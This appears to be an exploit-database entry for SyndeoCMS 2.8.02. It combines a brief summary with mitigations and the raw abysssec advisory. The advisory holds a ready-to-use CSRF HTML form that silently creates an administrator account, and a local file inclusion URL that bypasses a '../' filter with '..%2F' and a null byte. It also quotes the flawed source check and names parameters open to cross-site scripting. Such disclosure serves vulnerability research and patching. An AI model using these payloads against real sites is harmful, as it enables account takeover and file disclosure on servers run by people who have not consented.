syndeocms 2.8.02 Multiple Vulnerabilities

vendor:

syndeocms

by:

abysssec.com

8,8

CVSS

HIGH

CSRF - Add Admin Account, LFI (Local File Inclusion)

352, 22

CWE

Product Name: syndeocms

Affected Version From: syndeocms <= 2.8.02

Affected Version To: syndeocms <= 2.8.02

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

syndeocms 2.8.02 Multiple Vulnerabilities

This CMS have many critical vulnerability that we refer to some of those here: 1. CSRF - Add Admin Account: An attacker can craft a malicious HTML page that contains a form with hidden inputs. When the victim visits the page, the form is automatically submitted, creating a new admin account. 2. LFI (Local File Inclusion): An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal characters (e.g. ../../). This allows the attacker to include and execute arbitrary local files on the server.

Mitigation:

1. Restrict access to the application to trusted users. 2. Validate user input and filter out malicious characters. 3. Use a web application firewall to detect and block malicious requests.

Source

Exploit-DB raw data:

'''
  __  __  ____         _    _ ____  
 |  \/  |/ __ \   /\  | |  | |  _ \ 
 | \  / | |  | | /  \ | |  | | |_) |
 | |\/| | |  | |/ /\ \| |  | |  _ <  Day 4 (0day)
 | |  | | |__| / ____ \ |__| | |_) |
 |_|  |_|\____/_/    \_\____/|____/ 

'''
 
Title  : syndeocms 2.8.02 Multiple Vulnerabilities
Affected Version : syndeocms <= 2.8.02 
Vendor  Site   : http://www.syndeocms.org/
 
Discovery : abysssec.com
  
 
Description :
 
This CMS have many critical vulnerability that we refere to some of those here:
 
 
Vulnerabilites :

1. CSRF - Add Admin Account:

<html>
<body>
<form onsubmit="return checkinput(this);" action="index.php?option=configuration&suboption=users&modoption=save_user&user_id=0" name="form" method="POST">
<input class="textfield" type="hidden"  name="fullname" value="csrf"/>
<input class="textfield" type="hidden"  name="username" value="csrf_admin"/>
<input class="textfield" type="hidden"  name="password" value="admin123"/>
<input class="textfield" type="hidden"  name="email" value="csrf@admin.com"/>
<select name="editor">
<option value="1" selected="">FCKEditor</option>
<option value="2">Plain text Editor</option>
</select>
<input type="checkbox" checked="" name="initial" value="1"/>
<input class="textfield" type="hidden" value=""  name="sections"/>
<input type="radio" name="access_1" value="1"/>
<input type="radio" name="access_2" value="1"/>
.
.
.
<input type="radio" name="access_15" value="1"/>
<input type="radio" name="m_access[0]" value="1"/>
.
.
.
<input type="radio" name="m_access[21]" value="1"/>
<input class="savebutton" type="submit" name="savebutton" value="   Save"/>
</form>
</body>
</html>
-------------------------------------
2. LFI (Local File Inclusion):

http://localhost/starnet/index.php?option=configuration&suboption=configuration&modoption=edit_css&theme=..%2Findex.php%00

in starnet\core\con_configuration.inc.php file, As you may noticed theme parameter is checked for "../" and could be bypass by with "..%2F":
line 61-73:
switch ($modoption) // start of switch
{
	case save_css :
	
		if (IsSet ($_POST['content']))
		{
			$content = $_POST['content'];
		}
		
		if (strpos($theme, "../") === FALSE) //check if someone is trying to fool us.
		{
			$filename = "themes/$theme/style.css";
-------------------------------------
3. xss:
in starnet\core\con_alerts.inc.php file "email" parameter when "modoption" is "save_alert":
http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert&alert=2

4. stored xss:
in starnet\core\con_alerts.inc.php file "name" parameter when "modoption" is "save_alert":
http://localhost/starnet/index.php?option=configuration&suboption=alerts&modoption=edit_alert
------------------------------